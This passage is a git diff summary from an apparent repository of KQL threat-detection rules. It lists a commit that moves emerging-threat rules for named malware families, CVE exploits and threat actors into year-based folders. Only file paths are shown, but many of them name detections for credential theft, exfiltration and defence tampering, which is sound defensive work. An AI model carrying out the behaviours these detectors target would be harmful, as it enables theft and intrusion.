.../registry_set}/servicedll_hijack.kql | 0 ...sion_manager_autorun_keys_modification.kql | 0 ...lication_allowed_through_exploit_guard.kql | 0 ...vironment_variable_has_been_registered.kql | 0 ...of_renamed_sysinternals_tools_registry.kql | 12 ++++++++++ .../suspicious_keyboard_layout_load.kql | 0 ...eyboard_layout_ime_file_registry_value.kql | 0 ...icious_powershell_in_registry_run_keys.kql | 0 ...ious_printer_driver_empty_manufacturer.kql | 0 .../suspicious_service_installed.kql | 0 ...icious_shim_database_patching_activity.kql | 0 ...cters_in_runmru_registry_path_clickfix.kql | 0 ...rs_in_typedpaths_registry_path_filefix.kql | 0 .../sysmon_driver_altitude_change.kql | 0 ...stem_scripts_autorun_keys_modification.kql | 0 .../tamper_with_sophos_av_registry_keys.kql | 0 ...rust_access_disable_for_vbapplications.kql | 0 ...s_abusing_winsat_path_parsing_registry.kql | 0 ...ss_using_windows_media_player_registry.kql | 0 .../uac_bypass_via_event_viewer.kql | 0 .../registry_set}/uac_bypass_via_sdclt.kql | 0 .../registry/registry_set}/uac_disabled.kql | 0 .../uac_notification_disabled.kql | 0 .../uac_secure_desktop_prompt_disabled.kql | 0 ...eyboard_layout_ime_file_registry_value.kql | 0 ...icrosoft_office_trusted_location_added.kql | 0 ...renamed_sysinternals_tools_registryset.kql | 0 .../vbscript_payload_stored_in_registry.kql | 0 .../wdigest_enable_uselogoncredential.kql | 0 .../wfp_filter_added_via_registry.kql | 0 ...ows_defender_exclusions_added_registry.kql | 0 ...ows_defender_service_disabled_registry.kql | 0 ...vent_log_access_tampering_via_registry.kql | 0 ...indows_recall_feature_enabled_registry.kql | 0 .../winget_admin_settings_modification.kql | 0 ...inlogon_allowmultipletssessions_enable.kql | 0 .../winlogon_notify_key_logon_persistence.kql | 0 .../winsock2_autorun_keys_modification.kql | 0 ...node_classes_autorun_keys_modification.kql | 0 ...rrentversion_autorun_keys_modification.kql | 0 ...rrentversion_autorun_keys_modification.kql | 0 helper.py | 12 +++++++--- sigma | 2 +- 2251 files changed, 350 insertions(+), 142 deletions(-) rename KQL/rules-emerging-threats/{Execution => 2014/TA/Axiom}/zxshell_malware.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2014/TA/Turla}/turla_group_commands_may_2020.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2014/TA/Turla}/turla_group_lateral_movement.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2015/Exploits/CVE-2015-1641}/exploit_for_cve_2015_1641.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Exploits/CVE-2017-0261}/exploit_for_cve_2017_0261.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Exploits/CVE-2017-11882}/droppers_exploiting_cve_2017_11882.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Exploits/CVE-2017-8759}/exploit_for_cve_2017_8759.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Malware/Adwind-RAT}/adwind_rat_jrat.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/Malware/Fireball}/fireball_archer_install.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2017/Malware/NotPetya}/notpetya_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2017/Malware/PlugX}/potential_plugx_activity.kql (100%) rename KQL/rules-emerging-threats/{Lateral Movement => 2017/Malware/WannaCry}/wannacry_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2017/TA/APT10}/potential_apt10_cloud_hopper_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2017/TA/Dragonfly}/ps_exe_renamed_sysinternals_tool.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2017/TA/Lazarus}/lazarus_system_binary_masquerading.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2017/TA/Pandemic}/pandemic_registry_key.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2018/Malware/Elise-Backdoor}/elise_backdoor_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/APT27}/apt27_emissary_panda_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/APT28}/sofacy_trojan_loader_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/APT29-CozyBear}/apt29_2018_phishing_campaign_commandline_indicators.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/APT29-CozyBear}/apt29_2018_phishing_campaign_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2018/TA/APT32-Oceanlotus}/oceanlotus_registry_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2018/TA/MuddyWater}/potential_muddywater_apt_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/OilRig}/oilrig_apt_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/OilRig}/oilrig_apt_registry_persistence.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2018/TA/Slingshot}/defrag_deactivation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2018/TA/TropicTrooper}/tropictrooper_campaign_november_2018.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2019/Exploits/BearLPE-Exploit}/potential_bearlpe_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2019/Exploits/CVE-2019-1378}/exploiting_setupcomplete_cmd_cve_2019_1378.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2019/Exploits/CVE-2019-1388}/exploiting_cve_2019_1388.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/Exploits/CVE-2019-14287}/sudo_privilege_escalation_cve_2019_14287.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/BabyShark}/potential_baby_shark_malware_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/Malware/Dridex}/potential_dridex_activity.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2019/Malware/Dtrack-RAT}/potential_dtrack_rat_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/Emotet}/potential_emotet_activity.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2019/Malware/Formbook}/formbook_process_creation.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2019/Malware/LockerGoga}/lockergoga_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/QBot}/potential_qbot_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2019/Malware/Ryuk}/potential_ryuk_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2019/Malware/Snatch}/potential_snatch_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2019/Malware/Ursnif}/potential_ursnif_malware_activity_registry.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/TA/APC-C-12}/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql (100%) rename KQL/rules-emerging-threats/{Collection => 2019/TA/APT31}/apt31_judgement_panda_activity.kql (100%) rename KQL/rules-emerging-threats/{Credential Access => 2019/TA/Bear-APT-Activity}/potential_russian_apt_credential_theft_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/TA/EmpireMonkey}/potential_empiremonkey_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2019/TA/EquationGroup}/equation_group_dll_u_export_function_load.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2019/TA/MustangPanda}/mustang_panda_dropper.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2019/TA/Operation-Wocao}/operation_wocao_activity.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2020/Exploits/CVE-2020-10189}/exploited_cve_2020_10189_zoho_manageengine.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2020/Exploits/CVE-2020-1048}/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2020/Exploits/CVE-2020-1048}/suspicious_printerports_creation_cve_2020_1048_.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2020/Exploits/CVE-2020-1350}/dns_rce_cve_2020_1350.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/Exploits/CVE-2020-1472}/exploitation_attempt_of_cve_2020_1472_execution_of_zerologon_poc.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2020/Malware/Blue-Mockingbird}/blue_mockingbird.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/Blue-Mockingbird}/blue_mockingbird_registry.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/Emotet}/potential_emotet_rundll32_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/FlowCloud}/flowcloud_registry_markers.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/Malware/Ke3chang-TidePool}/potential_ke3chang_tidepool_malware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/Malware/Maze}/potential_maze_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/Malware/Trickbot}/trickbot_malware_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2020/TA/Evilnum}/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql (100%) rename KQL/rules-emerging-threats/{Credential Access => 2020/TA/GALLIUM}/gallium_iocs.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/Greenbug}/greenbug_espionage_group_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/Lazarus}/lazarus_group_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/Leviathan}/leviathan_registry_key_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/SolarWinds-Supply-Chain}/suspicious_vbscript_un2452_pattern.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/SolarWinds-Supply-Chain}/unc2452_powershell_pattern.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2020/TA/SolarWinds-Supply-Chain}/unc2452_process_creation_patterns.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/TAIDOOR-RAT}/taidoor_rat_dll_load.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/Winnti}/winnti_malware_hk_university_campaign.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2020/TA/Winnti}/winnti_pipemon_characteristics.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-1675}/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Exploits/CVE-2021-1675}/potential_printnightmare_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-1675}/printernightmare_mimikatz_driver_name.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Exploits/CVE-2021-1675}/windows_spooler_service_suspicious_binary_load.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2021/Exploits/CVE-2021-26084}/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-26857}/potential_cve_2021_26857_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-26858}/cve_2021_26858_exchange_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2021/Exploits/CVE-2021-33771}/cve_2021_31979_cve_2021_33771_exploits.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2021/Exploits/CVE-2021-33771}/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Exploits/CVE-2021-35211}/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-40444}/potential_cve_2021_40444_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-40444}/potential_exploitation_attempt_from_office_application.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2021/Exploits/CVE-2021-40444}/suspicious_word_cab_file_write_cve_2021_40444.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Exploits/CVE-2021-41379}/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Exploits/CVE-2021-41379}/potential_cve_2021_41379_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Exploits/CVE-2021-44077}/cve_2021_44077_poc_default_dropped_file.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2021/Exploits/CVE-2021-44228}/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Exploits/RazerInstaller-LPE-Exploit}/suspicious_razerinstaller_explorer_subprocess.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Exploits/SystemNightmare-Exploit}/potential_systemnightmare_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/BlackByte}/blackbyte_ransomware_registry.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/BlackByte}/potential_blackbyte_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Collection => 2021/Malware/Conti}/conti_ntds_exfiltration_command.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2021/Malware/Conti}/conti_volume_shadow_listing.kql (100%) rename KQL/rules-emerging-threats/{Impact => 2021/Malware/Conti}/potential_conti_ransomware_activity.kql (100%) rename KQL/rules-emerging-threats/{Collection => 2021/Malware/Conti}/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/DarkSide}/darkside_ransomware_pattern.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Malware/Devil-Bait}/potential_devil_bait_malware_reconnaissance.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Malware/Devil-Bait}/potential_devil_bait_related_indicator.kql (100%) rename KQL/rules-emerging-threats/{Resource Development => 2021/Malware/FoggyWeb}/foggyweb_backdoor_dll_loading.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/Goofy-Guineapig}/goofy_guineapig_backdoor_ioc.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/Malware/Goofy-Guineapig}/potential_goofy_guineapig_backdoor_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Malware/Goofy-Guineapig}/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/Moriya-Rootkit}/moriya_rootkit_file_created.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/Netwire}/potential_netwire_rat_activity_registry.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Pingback}/pingback_backdoor_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Pingback}/pingback_backdoor_dll_loading_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Pingback}/pingback_backdoor_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/Malware/Small-Sieve}/small_sieve_malware_commandline_indicator.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/Malware/Small-Sieve}/small_sieve_malware_file_indicator_creation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/Malware/Small-Sieve}/small_sieve_malware_registry_persistence.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2021/TA/HAFNIUM}/hafnium_exchange_exploitation_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2021/TA/Kaseya-Supply-Chain}/revil_kaseya_incident_malware_patterns.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2021/TA/PRIVATELOG}/apt_privatelog_image_load_pattern.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2021/TA/SOURGUM}/sourgum_actor_behaviours.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Exploits/CVE-2022-21554}/potential_cve_2023_21554_queuejumper_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Exploits/CVE-2022-22954}/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Exploits/CVE-2022-24527}/cve_2022_24527_microsoft_connected_cache_lpe.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2022/Exploits/CVE-2022-26134}/atlassian_confluence_cve_2022_26134.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2022/Exploits/CVE-2022-26809}/potential_cve_2022_26809_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Exploits/CVE-2022-29072}/potential_cve_2022_29072_exploitation_attempt.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2022/Exploits/CVE-2022-30190}/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2022/Exploits/CVE-2022-33891}/apache_spark_shell_command_injection_processcreation.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Exploits/CVE-2022-41120}/suspicious_sysmon_as_execution_parent.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Malware/ChromeLoader}/chromeloader_malware_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Emotet}/emotet_loader_execution_via_lnk_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Hermetic-Wiper}/hermetic_wiper_tg_process_patterns.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Raspberry-Robin}/potential_raspberry_robin_dot_ending_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Raspberry-Robin}/raspberry_robin_initial_execution_from_external_drive.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/Raspberry-Robin}/raspberry_robin_subsequent_execution_of_commands.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/Malware/Serpent-Backdoor}/serpent_backdoor_payload_execution_via_scheduled_task.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/Malware/SocGholish}/fakeupdates_socgholish_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2022/TA/ACTINIUM}/potential_actinium_persistence_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2022/TA/MERCURY}/mercury_apt_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-22518}/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-22518}/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Exploits/CVE-2023-23397}/outlook_task_note_reminder_received.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Exploits/CVE-2023-27363}/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit}/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-36874}/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-36874}/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-36874}/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Exploits/CVE-2023-36884}/potential_cve_2023_36884_exploitation_dropped_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-38831}/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-38831}/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Exploits/CVE-2023-40477}/cve_2023_40477_potential_exploitation_rev_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Initial Access => 2023/Exploits/Windows-Server-Unknown-Exploit}/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/coldsteel_rat_anonymous_user_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/coldsteel_rat_cleanup_command_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/coldsteel_rat_service_persistence_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_persistence_service_dll_creation.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_persistence_service_dll_load.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_rat_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/COLDSTEEL}/potential_coldsteel_rat_windows_user_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/DarkGate}/darkgate_autoit3_exe_execution_parameters.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/Malware/DarkGate}/darkgate_autoit3_exe_file_creation_by_uncommon_process.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/DarkGate}/darkgate_user_created_via_net_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Griffon}/griffon_malware_attack_pattern.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2023/Malware/GuLoader}/injected_browser_process_spawning_rundll32_guloader_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/IcedID}/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Pikabot}/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/Malware/Pikabot}/potential_pikabot_c2_activity.kql (100%) rename KQL/rules-emerging-threats/{Discovery => 2023/Malware/Pikabot}/potential_pikabot_discovery_activity.kql (100%) rename KQL/rules-emerging-threats/{Privilege Escalation => 2023/Malware/Pikabot}/potential_pikabot_hollowing_activity.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Pikabot}/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/potential_qakbot_rundll32_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/qakbot_regsvr32_calc_pattern.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/qakbot_rundll32_exports_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Qakbot}/qakbot_rundll32_fake_dll_extension_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Qakbot}/qakbot_uninstaller_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/Malware/Rhadamanthys}/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Rorschach}/rorschach_ransomware_execution_activity.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/SNAKE}/potential_encrypted_registry_blob_related_to_snake_malware.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/potential_snake_malware_installation_binary_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/potential_snake_malware_installation_cli_arguments_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/potential_snake_malware_persistence_service_execution.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 2023/Malware/SNAKE}/snake_malware_covert_store_registry_key.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/snake_malware_installer_name_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/snake_malware_kernel_driver_file_indicator.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/SNAKE}/snake_malware_werfault_persistence_file_creation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/Malware/Ursnif}/ursnif_redirection_of_discovery_commands.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/3CX-Supply-Chain}/malicious_dll_load_by_compromised_3cxdesktopapp.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/TA/3CX-Supply-Chain}/potential_compromised_3cxdesktopapp_beaconing_activity_netcon.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/3CX-Supply-Chain}/potential_compromised_3cxdesktopapp_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/3CX-Supply-Chain}/potential_compromised_3cxdesktopapp_update_activity.kql (100%) rename KQL/rules-emerging-threats/{Command and Control => 2023/TA/3CX-Supply-Chain}/potential_suspicious_child_process_of_3cxdesktopapp.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Cozy-Bear}/dll_names_used_by_svr_for_graphicalproton_backdoor.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Diamond-Sleet}/diamond_sleet_apt_dll_sideloading_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Diamond-Sleet}/diamond_sleet_apt_file_creation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Diamond-Sleet}/diamond_sleet_apt_process_activity_indicators.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Diamond-Sleet}/diamond_sleet_apt_scheduled_task_creation_registry.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/FIN7}/potential_apt_fin7_reconnaissance_powertrash_related_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/FIN7}/potential_apt_fin7_related_powershell_script_created.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Lace-Tempest}/lace_tempest_cobalt_strike_download.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Lace-Tempest}/lace_tempest_file_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Lace-Tempest}/lace_tempest_malware_loader_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/Lazarus}/lazarus_apt_dll_sideloading_activity.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mint-Sandstorm}/mint_sandstorm_asperafaspex_suspicious_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mint-Sandstorm}/mint_sandstorm_log4j_wstomcat_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mint-Sandstorm}/mint_sandstorm_manageengine_suspicious_process_execution.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Mustang-Panda-Australia-Campaign}/potential_apt_mustang_panda_activity_against_australian_gov.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Onyx-Sleet}/onyx_sleet_apt_file_creation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/PaperCut-Print-Management-Exploitation}/papercut_mf_ng_exploitation_related_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/PaperCut-Print-Management-Exploitation}/papercut_mf_ng_potential_exploitation.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/Peach-Sandstorm}/peach_sandstorm_apt_process_activity_indicators.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_barracuda_esg_exploitation_indicators.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_download_compressed_files_from_temp_sh_using_wget.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_download_tar_file_from_untrusted_direct_ip_via_wget.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_email_exfiltration_file_pattern.kql (100%) rename KQL/rules-emerging-threats/{Execution => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_potential_seaspy_execution.kql (100%) rename KQL/rules-emerging-threats/{Defense Evasion => 2023/TA/UNC4841-Barracuda-ESG-Zero-Day-Exploitation}/unc4841_ssl_certificate_exfiltration_via_openssl.kql (100%) rename KQL/rules-emerging-threats/{Persistence => 